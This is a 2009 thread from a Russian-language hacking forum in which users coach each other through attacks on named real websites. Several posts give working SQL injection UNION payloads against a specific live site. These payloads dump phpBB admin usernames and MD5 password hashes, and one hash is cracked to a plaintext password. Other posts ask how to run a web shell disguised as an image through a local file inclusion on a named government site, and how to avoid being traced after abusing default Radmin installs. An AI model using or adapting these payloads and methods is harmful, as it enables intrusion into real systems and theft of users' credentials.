ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.05.2009, 10:26
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
Сообщение от R1dex
Да, с сайтом угадал.. Прокатывает и просто:
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,table_name,4,5,6,7+from+information_schema. Tables--+
 подскажите теперь как тут можно узнать имя и пасс админа или пользователя
|
|
|
21.05.2009, 10:41
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,concat_ws(0x3a,username,user_password),4,5, 6,7+from+phpbb_users--+
|
|
|
|
21.05.2009, 11:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Подскажите плиз можно ли провести SQL-inj
Строка вида site.ru/?cat=menu'
Если оборсать строка menu'--+ то не ошибки не инфы не выводит...
А вот если menu'+ То инфа выводится как при нормальном запросе
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'menu\'='main'' at line 1
SELECT count(*)/4 as count FROM thum where cat='menu\' or 'menu\'='main'
Последний раз редактировалось Byrger; 21.05.2009 в 12:02..
|
|
|
|
21.05.2009, 13:26
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
Сообщение от AlexSatter
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,concat_ws(0x3a,username,user_password),4,5, 6,7+from+phpbb_users--+
для админов можно и так
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,group_concat(concat_ws(0x3a,username,user_p assword)+separator+'<br>'),4,5,6,7+from+phpbb_user s+where+user_level=1--+
Последний раз редактировалось PaCo; 21.05.2009 в 13:34..
|
|
|
|
21.05.2009, 14:21
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162
Репутация:
0
|
|
local include
залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:
Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]
как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php
|
|
|
|
21.05.2009, 15:07
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
Сообщение от PaCo
Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
для админов можно и так
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,group_concat(concat_ws(0x3a,username,user_p assword)+separator+'<br>'),4,5,6,7+from+phpbb_user s+where+user_level=1--+
да я тоже прочитал и при таком раскладе выходит это
oxana:c4ca4238a0b923820dcc509a6f75849b
administrator:30f46374c898450c560f8c14999b7ff7-
что это означает первая часть логин а второе как расшифровать
|
|
|
|
21.05.2009, 15:13
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
2AET - начни что то читать, а то это не дело так, если учесть что ты еще шелл захочешь залить то тут твоих вопросов будет на 10 страниц, это md5
oxana:c4ca4238a0b923820dcc509a6f75849b - 1
то есть логин - oxana пароль 1
|
|
|
|
21.05.2009, 15:15
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Вторая - это md5 хеш того, что находится в колонке user_password
для расшифровки есть много сервисов, или же самостоятельно брутить с помощью скажем пассворд рековер..
|
|
|
|
21.05.2009, 15:42
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162
Репутация:
0
|
|
Сообщение от slammer
залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:
Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]
как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php
вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php
|
|
|
|
21.05.2009, 16:02
|
|
Banned
Регистрация: 28.03.2008
Сообщений: 138
Провел на форуме:
609080
Репутация:
184
|
|
Люди help plz. Я кароч насканил кучу ip нашол дефлотные радминов. и без проксей
подрубился и начал пакостить
1) У радмина v2 or v2.1 есть log где айпишники подрубившихся?
2)если я подключился к дефлотному радмину - это наказуемо (преступление)?
3)Радмин v2 or v2.1 ведёт лог что с токогото ip была запушена какянит прога?
4)Я сижу под NAT'ом с динамичким ip. ADSL
меня могут вычислить?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
